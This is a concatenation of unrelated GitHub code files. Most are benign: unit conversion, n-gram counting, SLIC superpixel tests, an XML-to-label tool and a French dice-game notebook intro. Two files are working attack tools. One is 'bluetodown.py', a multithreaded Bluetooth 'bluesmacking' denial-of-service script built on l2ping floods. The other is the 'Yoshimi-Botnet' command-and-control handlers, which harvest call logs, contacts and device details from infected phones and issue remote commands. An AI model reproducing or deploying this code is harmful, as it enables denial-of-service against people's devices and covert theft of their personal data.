(\"Celsius\", \"Kelvin\"): lambda c: c + 273.15,\n (\"Celsius\", \"Fahrenheit\"): lambda c: (c * 9/5) + 32,\n (\"Kelvin\", \"Celsius\"): lambda k: k - 273.15,\n (\"Kelvin\", \"Fahrenheit\"): lambda k: (k - 273.15) * 9/5 + 32,\n (\"Fahrenheit\", \"Celsius\"): lambda f: (f - 32) * 5/9,\n (\"Fahrenheit\", \"Kelvin\"): lambda f: (f - 32) * 5/9 + 273.15,\n (\"Fahrenheit\", \"Fahrenheit\"): lambda f: f,\n (\"Kelvin\", \"Kelvin\"): lambda f: f,\n (\"Celsius\", \"Celsius\"): lambda f: f\n }\n \n distance_conversions = {\n (\"Miles\", \"Yards\"): lambda m: m * 1760,\n (\"Miles\", \"Meters\"): lambda m: m * 1609.34,\n (\"Yards\", \"Miles\"): lambda y: y / 1760,\n (\"Yards\", \"Meters\"): lambda y: y * 0.9144,\n (\"Meters\", \"Miles\"): lambda m: m / 1609.34,\n (\"Meters\", \"Yards\"): lambda m: m / 0.9144,\n (\"Meters\", \"Meters\"): lambda m: m, \n (\"Yards\", \"Yards\"): lambda m: m,\n (\"Miles\", \"Miles\"): lambda m: m \n }\n\n all_conversions = {**temperature_conversions, **distance_conversions}\n conversion_func = all_conversions.get((fromUnit, toUnit))\n if conversion_func:\n return conversion_func(value)\n else:\n raise ConversionNotPossible(f\"Conversion from {fromUnit} to {toUnit} is not possible.\")\n","repo_name":"elepore/IS211_Elizabeth_Lepore","sub_path":"IS211_Assignment6/conversions_refactored.py","file_name":"conversions_refactored.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7296416567","text":"# Author: @codigo_n3gro | https://linkedin.com/in/swagneycod3\n# Ano: 03/02/2021\n\n\nimport os\nimport sys\nimport time\nimport threading\n\ndef DOS(target_addr, packages_size):\n os.system('l2ping -i hci0 -s ' + str(packages_size) +' -f ' + target_addr)\n\ndef banner():\n print(''' \n BLUESMACKING ATTACK\n\n bluetodown.py target packt\n ''')\n \ndef main():\n banner()\n time.sleep(0.1)\n print('keep attention')\n if (input(\"Do you agree? 
(y/n) > \") in ['y', 'Y']):\n time.sleep(0.1)\n os.system('clear')\n banner()\n print('')\n\n target_addr = sys.argv[1]\n\n if len(target_addr) < 1:\n print('[!] ERROR: Target addr is missing')\n exit(0)\n\n try:\n packages_size = sys.argv[2]\n except:\n print('[!] ERROR: Packages size must be an integer')\n exit(0)\n try:\n threads_count = sys.argv[3]\n except:\n print('[!] ERROR: Threads count must be an integer')\n exit(0)\n print('')\n os.system('clear')\n\n print(\"\\x1b[31m[*] Wait just 3 seconds my Invader\")\n\n for i in range(0, 3):\n print('[*] ' + str(3 - i))\n time.sleep(1)\n \n print('[*] Building threads...\\n')\n\n for i in range(0, threads_count):\n print('[*] Built thread №' + str(i + 1))\n threading.Thread(target=DOS, args=[str(target_addr), str(packages_size)]).start()\n\n print('[*] Built all threads...')\n print('[*] STARTING...')\n else:\n print('RSRSRSRSRSRSRSRSRSRRSRSRS')\n exit(0)\n\nif __name__ == '__main__':\n try:\n os.system('clear')\n main()\n except KeyboardInterrupt:\n time.sleep(0.1)\n print('\\n[*] Aborted')\n exit(0)\n except Exception as e:\n time.sleep(0.1)\n print('[!] ERROR: ' + str(e)) \n","repo_name":"SwagneyCod3/RED-TEAM-SCRIPTS","sub_path":"bluetodown.py","file_name":"bluetodown.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"27979226629","text":"import json\nimport logging\n\nfrom models import PhoneBot, CallInfo, Contact, RemoteCommand\nfrom datetime import datetime\nfrom handlers.BaseHandlers import BotBaseHandler\nfrom tornado.web import RequestHandler\nfrom libs.SecurityDecorators import bots\n\nclass BotHelloHandler(BotBaseHandler):\n\n @bots\n def get(self, *args, **kwargs):\n ''' Bots come here and say hello '''\n bot = PhoneBot.by_uuid(self.request.headers['Uuid'])\n if bot == None:\n bot = PhoneBot(uuid = self.request.headers['Uuid'].encode('utf-8', 'ignore'))\n self.dbsession.add(bot)\n self.dbsession.flush()\n self.write(\"Welcome to the horde\")\n else:\n self.write(\"Pink evil robots\")\n self.finish()\n\nclass BotVersionHandler(BotBaseHandler):\n\n @bots\n def post(self, *args, **kwargs):\n ''' Collects version information '''\n try:\n # Prbly need to refactor this but it's more of a PoC\n self.bot.os_version = self.get_argument(\"os_version\").encode('utf-8', 'ignore')\n self.bot.build_version = self.get_argument(\"build_version\").encode('utf-8', 'ignore')\n self.bot.sdk_version = self.get_argument(\"sdk_version\").encode('utf-8', 'ignore')\n self.bot.release_version = self.get_argument(\"release_version\").encode('utf-8', 'ignore')\n self.bot.codename = self.get_argument(\"codename\").encode('utf-8', 'ignore')\n self.bot.device = self.get_argument(\"device\").encode('utf-8', 'ignore')\n self.bot.model = self.get_argument(\"model\").encode('utf-8', 'ignore')\n self.bot.product = self.get_argument(\"product\").encode('utf-8', 'ignore')\n self.bot.phone_number = self.get_argument(\"phone_number\").encode('utf-8', 'ignore')\n except:\n self.write(\"error\")\n self.finish()\n return\n self.dbsession.add(self.bot)\n self.dbsession.flush()\n self.write(\"ok\")\n self.finish()\n\nclass BotCallsHandler(BotBaseHandler):\n\n @bots\n def post(self, *args, **kwargs):\n try:\n jsonCalls = self.get_argument(\"jsonCalls\")\n calls = json.loads(jsonCalls)\n for key in calls.keys():\n call = json.loads(calls[key])\n phone_call = CallInfo(\n phone_bot_id = self.bot.id,\n call_type = call['callType'],\n number_type = call['numberType'],\n 
phone_number = call['phoneNumber'],\n contact_name = call['contactName'],\n )\n self.dbsession.add(phone_call)\n self.dbsession.flush()\n except:\n self.write(\"error\")\n self.finish()\n return\n self.write(\"ok\")\n self.finish()\n\nclass BotContactsHandler(BotBaseHandler):\n\n @bots\n def post(self, *args, **kwargs):\n try:\n jsonContact = self.get_argument(\"jsonContact\")\n except:\n self.write(\"Error: Missing parameter\")\n self.finish()\n return\n new_contact = json.loads(jsonContact)\n if Contact.by_phone_number(new_contact['phoneNumber'].replace(\";\", \"\")) == None:\n contact = Contact(\n phone_bot_id = self.bot.id,\n name = new_contact['contactName'].replace(\";\", \"\").encode('utf-8', 'ignore'),\n email = new_contact['contactEmail'].replace(\";\", \"\").encode('utf-8', 'ignore'),\n phone_number = new_contact['phoneNumber'].replace(\";\", \"\").encode('utf-8', 'ignore'),\n )\n self.dbsession.add(contact)\n self.dbsession.flush()\n self.write(\"ok\")\n self.finish()\n\nclass BotSmsHandler(BotBaseHandler):\n\n @bots\n def post(self, *args, **kwargs):\n ''' Collects Sms information from bot '''\n pass\n\nclass BotPingHandler(BotBaseHandler):\n\n @bots\n def get(self, *args, **kwargs):\n ''' Updates the last_seen, sends commands if they exist '''\n self.bot.last_seen = datetime.now()\n if 0 < RemoteCommand.qsize(self.bot.id):\n remote_command = RemoteCommand.pop(self.bot.id)\n self.write(remote_command.command)\n else:\n self.write(\"nop\")\n self.dbsession.add(self.bot)\n self.dbsession.flush()\n self.finish()\n\nclass BotCompletedCommandHandler(BotBaseHandler):\n\n @bots\n def get(self, *arg, **kwargs):\n ''' Bot reports here when a remote command has been completed successfully '''\n if 0 < RemoteCommand.qsize(self.bot.id):\n remote_command = RemoteCommand.pop(self.bot.id)\n remote_command.completed = True\n self.dbsession.add(remote_command)\n self.dbsession.flush()\n self.write('ok')\n self.finish()\n","repo_name":"moloch--/Yoshimi-Botnet","sub_path":"YoshimiControl/handlers/BotHandlers.py","file_name":"BotHandlers.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"53"} +{"seq_id":"15777585754","text":"from collections import Counter\n\n\nRU_LETTERS = set(\"абвгдеёжзиклмнопрстуфхцчшщьыъэюя\")\n\n\ndef slide_filtered(s, fn, w):\n for start in range(len(s) - w + 1):\n window = s[start:start+w]\n if all(map(fn, window)):\n yield window\n\n\ndef frequencies(text, f, win_size):\n counts = Counter(slide_filtered(text, f, win_size))\n total = sum(counts.values())\n return list(map(lambda p: (p[0], p[1] / total), counts.most_common()))\n\n\nif __name__ == '__main__':\n import sys\n import time\n path = sys.argv[1]\n window_size = int(sys.argv[2])\n\n t = time.perf_counter()\n with open(path) as text:\n for el, freq in frequencies(text.read().lower(), lambda c: c in RU_LETTERS, window_size):\n print(\"{} - {:.6f}\".format(el, freq))\n print(\"Done in {:.3f} s\".format(time.perf_counter() - t))\n","repo_name":"modelflat/practice-again","sub_path":"python/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74923259689","text":"# from myslic import *\n# from otherslic import *\nimport time\nimport unittest\n# from myslic import *\nimport cv2\nimport math\nimport numpy as np\nfrom skimage import io, color\nfrom numpy.testing import assert_almost_equal\nimport copy\n# 
from slic_fcts import *\n\ndef get_triangle_coordinates(rows, cols, L, frame):\n col_nb = (int)((cols - 2 * frame - L / 2) / L)\n col_coord = np.linspace(frame, cols - frame - 1 - L / 2, col_nb)\n coordinates = []\n row_nb = (int)((rows - 2 * frame) / L)\n row_coord = np.linspace(frame, rows - frame - 1, row_nb)\n for i, r in enumerate(row_coord):\n for c in col_coord:\n if i % 2 == 0:\n coordinates.append((int(r), int(c + L / 2)))\n else:\n coordinates.append((int(r), int(c)))\n return coordinates\n\n\ndef get_grid_coordinates(rows, cols, L, frame):\n col_nb = (int)((cols - 2 * frame - L / 2) / L)\n col_coord = np.linspace(frame, cols - frame - 1, col_nb)\n coordinates = []\n row_nb = (int)((rows - 2 * frame) / L)\n row_coord = np.linspace(frame, rows - frame - 1, row_nb)\n for i, r in enumerate(row_coord):\n for c in col_coord:\n coordinates.append((int(r), int(c)))\n return coordinates\n\n\nclass Cluster(object):\n cluster_index = 0\n\n def __init__(self, h, w, l=0, a=0, b=0):\n self.update(h, w, l, a, b)\n self.pixels = []\n self.no = self.cluster_index\n Cluster.cluster_index += 1\n\n def update(self, h, w, l, a, b):\n self.h = h\n self.w = w\n self.l = l\n self.a = a\n self.b = b\n\n def __str__(self):\n return \"{},{}:{} {} {} \".format(self.h, self.w, self.l, self.a, self.b)\n\n def __repr__(self):\n return self.__str__()\n\n def clear(self):\n self.pixels = []\n\n\nclass TestSLIC(unittest.TestCase):\n K = 40\n M = 50\n data = io.imread('parrot0.jpg')\n data = color.rgb2lab(data)\n image_height = data.shape[0]\n image_width = data.shape[1]\n N = image_height * image_width\n S = int(math.sqrt(N / K))\n coord = get_grid_coordinates(image_height, image_width, S, 10)\n border = 2 * S\n clusters = []\n for c in coord:\n h_ = int(c[0])\n w_ = int(c[1])\n # Replace make clusters\n c = Cluster(h_, w_, data[h_][w_][0], data[h_][w_][1], data[h_][w_][2])\n clusters.append(c)\n data = cv2.copyMakeBorder(data, border, border, border, border, cv2.BORDER_CONSTANT)\n image_height = data.shape[0]\n image_width = data.shape[1]\n for c in clusters:\n c.update(c.h + border, c.w + border, c.l, c.a, c.b)\n\n label = {}\n dis = np.full((image_height, image_width), -1.0)\n dis[border:image_height - border, border:image_width - border] = np.inf\n D = np.full((image_height, image_width), -1.0)\n D[border:image_height - border, border:image_width - border] = np.inf\n LABEL = np.full((image_height, image_width), -1.0)\n clusters_temp = np.empty((clusters[0].cluster_index, 3))\n\n test_slices = np.empty((len(clusters), 4 * S, 4 * S, 5), dtype='float32') # [x,y,l,a,b] per pixel\n test_slices_d = np.empty((len(clusters), 4 * S, 4 * S), dtype='float32')\n test_slices_mask = np.empty((len(clusters), 4 * S, 4 * S), dtype='bool') * False\n test_final_labels = np.ones(D.shape) * -1\n\n for i, cluster in enumerate(clusters):\n # print(\"this is cluster \", i)\n for h in range(cluster.h - 2 * S, cluster.h + 2 * S):\n for w in range(cluster.w - 2 * S, cluster.w + 2 * S):\n L, A, B = data[h][w]\n h_ = h - (cluster.h - 2 * S)\n w_ = w - (cluster.w - 2 * S)\n test_slices[i, h_, w_] = h, w, L, A, B\n Dc = math.sqrt(\n math.pow(L - cluster.l, 2) +\n math.pow(A - cluster.a, 2) +\n math.pow(B - cluster.b, 2))\n Ds = math.sqrt(\n math.pow(h - cluster.h, 2) +\n math.pow(w - cluster.w, 2))\n dist = math.sqrt(math.pow(Dc / M, 2) + math.pow(Ds / S, 2))\n D[h, w] = dist\n test_slices_d[i, h_, w_] = dist\n if D[h, w] < dis[h][w]:\n if (h, w) not in label:\n label[(h, w)] = cluster\n else:\n label[(h, w)].pixels.remove((h, w))\n 
label[(h, w)] = cluster\n cluster.pixels.append((h, w))\n # here\n test_slices_mask[i, h_, w_] = True\n test_final_labels[h, w] = int(cluster.no)\n dis[h][w] = D[h, w]\n\n new_clusters = copy.deepcopy(clusters)\n clusters_pos = np.empty((len(new_clusters), 2), dtype=float)\n for i, cluster in enumerate(new_clusters):\n sum_h = sum_w = number = 0\n for p in cluster.pixels:\n sum_h += p[0]\n sum_w += p[1]\n number += 1\n _h = int(sum_h / number)\n _w = int(sum_w / number)\n cluster.update(_h, _w, data[_h][_w][0], data[_h][_w][1], data[_h][_w][2])\n clusters_pos[i] = np.array([int(_h), int(_w)])\n\n def get_slices(self, clusters, S, data):\n # mat = np.ones((len(self.clusters), 4 * self.S, 4 * self.S, 5), dtype='float32')\n # for i, cluster in enumerate(self.clusters):\n # for h in range(0, 4 * self.S):\n # for w in range(0, 4 * self.S):\n # h_ = h + (cluster.h - 2 * self.S)\n # w_ = w + (cluster.w - 2 * self.S)\n # L, A, B = self.data[h_][w_]\n # mat[i, h, w] = [h_, w_, L, A, B]\n p = np.empty((len(clusters), 2))\n for i, cluster in enumerate(clusters):\n p[i] = [cluster.h, cluster.w]\n\n mat2 = np.ones((len(clusters), 4 * S, 4 * S, 5), dtype='float32')\n xv, yv = np.meshgrid(np.arange(0, 4 * S), np.arange(0, 4 * S), indexing='ij')\n for i in range(len(clusters)):\n temp_x = xv + p[i, 0] - 2 * S\n temp_y = yv + p[i, 1] - 2 * S\n temp_x = temp_x.astype(int)\n temp_y = temp_y.astype(int)\n mat2[i, :, :, 0] = temp_x\n mat2[i, :, :, 1] = temp_y\n mat2[i, :, :, 2:] = data[temp_x, temp_y]\n return mat2\n\n def get_slices_d(self, clusters, S, M, data):\n slices = self.get_slices(clusters, S, data)\n # mat = np.empty((len(self.clusters), 4 * self.S, 4 * self.S), dtype='float32')\n # matDc = np.empty((len(self.clusters), 4 * self.S, 4 * self.S), dtype='float32')\n # matDs = np.empty((len(self.clusters), 4 * self.S, 4 * self.S), dtype='float32')\n # for i, cluster in enumerate(self.clusters):\n # for h in range(0, 4 * self.S):\n # for w in range(0, 4 * self.S):\n # h_, w_, L, A, B = slices[i, h, w]\n # Dc = math.sqrt(\n # math.pow(cluster.l - L, 2) +\n # math.pow(cluster.a - A, 2) +\n # math.pow(cluster.b - B, 2))\n # matDc[i,h,w] = Dc\n # Ds = math.sqrt(\n # math.pow(cluster.h - h_, 2) +\n # math.pow(cluster.w - w_, 2))\n # matDs[i,h,w] = Ds\n # mat[i, h, w] = math.sqrt(math.pow(Dc / self.M, 2) + math.pow(Ds / self.S, 2))\n\n cluster_pos = np.empty((len(clusters), 2))\n for i, cluster in enumerate(clusters):\n cluster_pos[i] = [cluster.h, cluster.w]\n\n clusters = np.empty((len(clusters), 5), dtype='float32')\n clusters[:, 0] = cluster_pos[:, 0]\n clusters[:, 1] = cluster_pos[:, 1]\n cluster_pos = cluster_pos.astype(int)\n clusters[:, 2:] = data[cluster_pos[:, 0], cluster_pos[:, 1]]\n\n temp = copy.deepcopy(slices)\n temp = temp.astype(float)\n slices_dist = np.empty((len(clusters), 4 * S, 4 * S), dtype='float32')\n for i, cluster in enumerate(clusters):\n Ds = np.linalg.norm((temp[i, :, :, 0:2] - clusters[i, 0:2]), axis=2) / S\n Dc = np.linalg.norm((temp[i, :, :, 2:] - clusters[i, 2:]), axis=2) / M\n slices_dist[i] = np.power(np.power(Ds, 2) + np.power(Dc, 2), 0.5)\n\n return slices_dist\n\n def get_slices_mask(self, clusters, S, M, data, image_height, image_width, border):\n slices_d = self.get_slices_d(clusters, S, M, data)\n mat = np.ones((len(clusters), 4 * S, 4 * S), dtype=bool) * False\n temp_dis = np.full((image_height, image_width), -1.0)\n temp_dis[border:image_height - border, border:image_width - border] = np.inf\n # temp_D = np.full((self.image_height, self.image_width), -1.0)\n # 
temp_D[self.border:self.image_height - self.border, self.border:self.image_width - self.border] = np.inf\n # for i, cluster in enumerate(self.clusters):\n # temp_D = slices_d[i]\n # for h in range(0, 4 * self.S):\n # for w in range(0, 4 * self.S):\n # h_ = h + (cluster.h - 2 * self.S)\n # w_ = w + (cluster.w - 2 * self.S)\n # if temp_D[h, w] < temp_dis[h_][w_]:\n # mat[i, h, w] = True\n # temp_dis[h_][w_] = temp_D[h, w]\n\n\n temp_mat = np.ones((len(clusters), 4 * S, 4 * S), dtype=bool) * False\n temp_dis2 = np.full((image_height, image_width), -1.0)\n temp_dis2[border:image_height - border, border:image_width - border] = np.inf\n dis_slices = np.empty((len(clusters), 4 * S, 4 * S))\n\n cluster_pos = np.empty((len(clusters), 2))\n for i, cluster in enumerate(clusters):\n cluster_pos[i] = [cluster.h, cluster.w]\n\n xv, yv = np.meshgrid(np.arange(0, 4 * S), np.arange(0, 4 * S), indexing='ij')\n\n for i in range(len(clusters)):\n temp_x = xv + cluster_pos[i, 0] - 2 * S\n temp_y = yv + cluster_pos[i, 1] - 2 * S\n temp_x = temp_x.astype(int)\n temp_y = temp_y.astype(int)\n mask = slices_d[i] < temp_dis2[temp_x, temp_y]\n mat[i] = mask\n x0 = int(cluster_pos[i, 0] - 2 * S)\n x1 = int(cluster_pos[i, 0] + 2 * S)\n y0 = int(cluster_pos[i, 1] - 2 * S)\n y1 = int(cluster_pos[i, 1] + 2 * S)\n temp_dis2[x0:x1, y0:y1][mask] = slices_d[i][mask]\n #\n #\n # for i, cluster in enumerate(self.clusters):\n # mask = slices_d[i] < dis_slices[i]\n # mat[i] = mask\n # slices_d[i][mask]\n # for h in range(0, 4 * self.S):\n # for w in range(0, 4 * self.S):\n # h_ = h + (cluster.h - 2 * self.S)\n # w_ = w + (cluster.w - 2 * self.S)\n # if temp_D[h, w] < temp_dis[h_][w_]:\n # mat[i, h, w] = True\n # temp_dis[h_][w_] = temp_D[h, w]\n\n return mat, temp_dis2\n\n def get_final_labels(self, clusters, S, M, data, image_height, image_width, border, D):\n slices_mask, final_dis = self.get_slices_mask(clusters, S, M, data, image_height, image_width, border)\n temp = np.ones(D.shape) * -1\n mask2 = np.full(D.shape, False, dtype=bool)\n for i, cluster in enumerate(clusters):\n mask = slices_mask[i]\n mask2[cluster.h - 2 * S:cluster.h + 2 * S, cluster.w - 2 * S:cluster.w + 2 * S] = mask\n temp[mask2] = int(i)\n # Reset\n mask2[cluster.h - 2 * S:cluster.h + 2 * S, cluster.w - 2 * S:cluster.w + 2 * S] = False\n return temp\n\n def get_new_clusters(self, labels, clusters):\n # labels = self.get_final_labels(clusters, S, M, data, image_height, image_width, border, D)\n # temp = np.empty((len(self.new_clusters), 2), dtype=float)\n temp = np.empty((len(clusters), 2), dtype=float)\n # sub_labels = labels[self.border:self.image_height - self.border, self.border:self.image_width - self.border]\n # for i in range(len(self.new_clusters)):\n for i in range(len(clusters)):\n mask = labels == i\n center_of_mass = np.mean(np.where(mask), axis=1, dtype=int)\n temp[i, :] = center_of_mass\n return temp\n\n def test_slices_fct(self):\n np.testing.assert_allclose(self.test_slices, self.get_slices(self.clusters, self.S, self.data))\n\n def test_slices_d_fct(self):\n np.testing.assert_allclose(self.test_slices_d, self.get_slices_d(self.clusters, self.S, self.M, self.data), rtol=1e-6, atol=1e-6)\n\n def test_slices_mask_fct(self):\n mat2, _ = self.get_slices_mask(self.clusters, self.S, self.M, self.data, self.image_height, self.image_width, self.border)\n self.assertTrue((self.test_slices_mask == mat2).all())\n\n def test_dis_fct(self):\n mat = self.dis\n _, mat2 = self.get_slices_mask(self.clusters, self.S, self.M, self.data, self.image_height, 
self.image_width, self.border)\n np.testing.assert_allclose(mat, mat2, rtol=1e-6, atol=1e-6)\n\n def test_final_labels_fct(self):\n mat = self.test_final_labels\n mat2 = self.get_final_labels(self.clusters, self.S, self.M, self.data, self.image_height, self.image_width, self.border, self.D)\n np.testing.assert_allclose(mat, mat2, rtol=1e-6, atol=1e-6)\n\n def test_new_clusters_fct(self):\n pos = self.clusters_pos\n labels = self.get_final_labels(self.clusters, self.S, self.M, self.data, self.image_height, self.image_width, self.border, self.D)\n pos2 = self.get_new_clusters(labels, self.clusters)\n np.testing.assert_allclose(pos, pos2, rtol=1e-6, atol=1e-6)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"szat/Numpy-SLIC","sub_path":"unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2068237411","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 20 18:08:48 2017\n\n@author: andrew\n\nThis script could read polygon coordiante from a xml file and \ndraw those ones and fill according to palette.\nDraw result will save as 8-bits png with palette format.\nIn order to observe the result of drawing, draw_on_image method will\nblend result on orignal image.\nIf some part will draw wiht same pattern on every image, we could set\nmask xml file to do that.\nWe could call script by terminal and assign some options.\n\"\"\"\n\nimport os\nimport os.path as op\nimport shutil\nimport argparse\nimport assist_util as au\nimport xml_write as xw\nimport xml_read as xr\nimport draw_mark as dm\n \ndef init_generate(args):\n xml_dir = args.dir\n \n result_dir = op.join(os.getcwd(),'result')\n if not op.exists(result_dir):\n os.mkdir(result_dir)\n \n path_fraction = xml_dir.split('/')\n if path_fraction[-1] == '':\n orignal_dir = path_fraction[-2]\n else:\n orignal_dir = path_fraction[-1]\n \n label_dir = op.join(result_dir, (orignal_dir + '_label'))\n if op.exists(label_dir):\n shutil.rmtree(label_dir)\n os.makedirs(label_dir)\n else:\n os.makedirs(label_dir)\n \n dirlist = os.listdir(xml_dir) \n files = [x for x in dirlist if op.isfile(op.join(xml_dir,x))]\n assign_palette = au.create_png_palette()\n \n mask_file = args.mask\n if args.mask:\n mask = (xr.xml_decode_polygon(mask_file, args)[0][0][0]).pts \n else: \n mask = None\n \n if args.reference: \n str_index = args.reference\n try:\n label_index = str_index.split(',')\n label_ref = [int(x) for x in label_index]\n label_ref.append(int(255))\n except ValueError as e :\n print('Specific an abnormal class index: ', e )\n exit()\n else:\n label_ref = None\n \n if args.images:\n if not op.exists(args.images):\n raise IOError('No such directory contained images named: ', args.images)\n else:\n image_list = os.listdir(args.images)\n images = [x for x in image_list if op.isfile(op.join(args.images,x))] \n if len(images): \n check_dir = op.join(result_dir, (orignal_dir + '_check')) \n if op.exists(check_dir):\n shutil.rmtree(check_dir)\n os.makedirs(check_dir)\n else:\n os.makedirs(check_dir)\n #Copy labeled images to new directory\n extract_dir = op.join(result_dir, (orignal_dir + '_extract'))\n \n if op.exists(extract_dir):\n shutil.rmtree(extract_dir)\n os.makedirs(extract_dir)\n else:\n os.makedirs(extract_dir)\n else:\n print('Image directory is empty!!!!') \n else:\n check_dir = None\n extract_dir = None\n images = [] \n \n return (xml_dir, label_dir, files, 
assign_palette, mask,\n args.images, check_dir, extract_dir, images, label_ref)\n\ndef label_generate(args):\n\n (xml_dir, label_dir, labels, assign_palette, mask, \n image_path, check_dir, extract_dir, images, label_ref) = init_generate(args)\n \n bar_worker = au.process_bar(num_items= len(labels))\n \n if image_path == None:\n for f in labels:\n xml_file_name = op.join(xml_dir, f)\n \n object_dict, width, height = xr.xml_decode_polygon(xml_file_name, args, label_ref)\n label_perfix = op.splitext(f)[0] \n bar_worker.update()\n if object_dict:\n dm.create_label(label_perfix, label_dir, object_dict, \n width, height, assign_palette, args, mask_pts = mask)\n else: \n num_image = len(images)\n if num_image:\n images_perfix_list = [op.splitext(x)[0] for x in images]\n image_extension = op.splitext(images[0])[1]\n \n for f in labels:\n xml_file_name = op.join(xml_dir, f) \n object_dict, width, height = xr.xml_decode_polygon(xml_file_name, args, label_ref)\n label_perfix = op.splitext(f)[0] \n bar_worker.update()\n if object_dict:\n label = dm.create_label(label_perfix, label_dir, object_dict, \n width, height, assign_palette, args, mask_pts = mask) \n \n if num_image and (label_perfix in images_perfix_list):\n dm.draw_on_image(label_perfix + image_extension, image_path,\n check_dir, label, object_dict, args, mask)\n au.copy_image(extract_dir, image_path, label_perfix + image_extension, args)\n print('\\n')\n\n\ndef bbox_generate(args):\n (xml_dir, label_dir, labels, assign_palette, mask, \n image_path, check_dir, extract_dir, images, label_ref) = init_generate(args)\n \n bar_worker = au.process_bar(num_items= len(labels))\n \n # Define a inner function for different data source\n if args.bndbox == 1:\n # From polygon\n def xml_decode(xml_file_name, args):\n object_dict, width, height = xr.xml_decode_polygon(xml_file_name, args)\n bbox_list = xr.extract_bbox(height, width, object_dict)\n return bbox_list, height, width, 0, width, width\n elif args.bndbox == 2:\n # From bounding box\n def xml_decode(xml_file_name, args):\n bbox_list, width, height, lborder, rborder, nwidth = xr.xml_decode_bbox(xml_file_name, args)\n return bbox_list, width, height, lborder, rborder, nwidth\n else:\n raise ValueError('Specify a invalid method type: args - ', args.bndbox)\n \n if image_path:\n num_image = len(images)\n if num_image:\n images_perfix_list = [op.splitext(x)[0] for x in images]\n image_extension = op.splitext(images[0])[1] \n for f in labels:\n xml_file_name = op.join(xml_dir, f) \n bbox_list, width, height, lborder, rborder, nwidth = xml_decode(xml_file_name, args)\n bar_worker.update()\n if bbox_list:\n \n label_perfix = op.splitext(f)[0] \n \n if num_image and (label_perfix in images_perfix_list): \n dm.draw_poly2bbox(label_perfix + image_extension, image_path, check_dir, bbox_list, \n args, nwidth, lborder)\n xw.create_bbox(bbox_list, label_dir, height, nwidth, label_perfix, args.size)\n au.copy_image(extract_dir, image_path, label_perfix + image_extension, args,\n nwidth, lborder)\n else:\n raise IOError('Orignal image path must be provided!')\n \n print('\\n') \n \nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser( \n description= '''Convert xml label to image label for image segmentation\n ''',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n \n parser.add_argument('-d','--dir', type = str, default = None, required = True,\n help = 'The directory that contain xml label files')\n parser.add_argument('-m','--mask', type = str, default = None,\n help = 'The mask that will 
be used onto every label')\n parser.add_argument('-i','--images', type = str, default = None,\n help = '''The image directory, if this argument is set ,\n label will show on orignal image''')\n parser.add_argument('-t', '--transparent', type = int, default = 1,\n help = 'Whether draw label on orignal image transparently')\n parser.add_argument('-a', '--alpha', type = float, default = 0.4,\n help = 'Transparent ratio')\n parser.add_argument('-o', '--omit', type = int , default = 1,\n help = 'Whether treat the occluded object as ignore')\n parser.add_argument('-r', '--reference', type = str, default = None,\n help = '''Specific the which label will be used. \n Assign class index and sperate by comma''') \n parser.add_argument('-l', '--linewidth', type = int, default = 2,\n help = 'Ignore line width between different objects')\n parser.add_argument('-s', '--size', type = float, default = 1.0,\n help = 'Size ratio of orignal images and labels')\n parser.add_argument('-b', '--bndbox', type = int, default = 0,\n help = 'Wether to generate bounding box format label')\n parser.add_argument('-p', '--palette', type = int, default = 0,\n help = '0 object palette, 1 component palette')\n parser.add_argument('-f', '--fov', type = int, default = 128,\n help = 'Keep the scope of picture by FOV')\n parser.add_argument('-c', '--crop', type = int, default= 0,\n help = 'crop offset from top')\n\n args = parser.parse_args()\n \n if args.bndbox:\n bbox_generate(args)\n else:\n label_generate(args)\n","repo_name":"T800GHB/Python_Basic","sub_path":"reference_code/image_label_tools/label_generate/xml2lable.py","file_name":"xml2lable.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"813236741","text":"\n# coding: utf-8\n\n# # Simulons le jeu de *151* avec Python !\n# \n# ## But :\n# - Simuler numériquement le jeu de 151, qui est une variante à 3 dés du jeu appelé [5000](https://fr.wikipedia.org/wiki/5000),\n# - Afin de trouver une stratégie *optimale*.\n# \n# ## Comment ?\n# - On va simuler des millions de parties (cf. [méthodes de Monte-Carlo](https://fr.wikipedia.org/wiki/Méthodes_de_Monte-Carlo)),\n# - Afin de comparer différentes stratégies (aléatoires, s'arrêter au premier coup, s'arrêter après 3 coups, etc),\n# - On les compare en fonction de leur gain *moyen*,\n# - La meilleur stratégie sera celle qui apporte un gain moyen le plus élevé.\n# \n# ## Résultats ?\n# → Lien vers les résultats obtenus.\n\n# ----\n# \n# ## Plans\n# 1. fonctions pour simuler un tirage (3 dés),\n# 2. puis simuler une une partie (affrontant deux stratégies, face à un total), plein de parties (total aléatoire),\n# 3. implémenter différentes stratégies,\n# 4. les comparer, faire des graphiques, et tirer des conclusions statistiquement valides (avec moyennes *et* écart-types).\n\n# ----\n# \n# ## 1. Simuler un tirage et une partie\n\n# ### 1.1. 
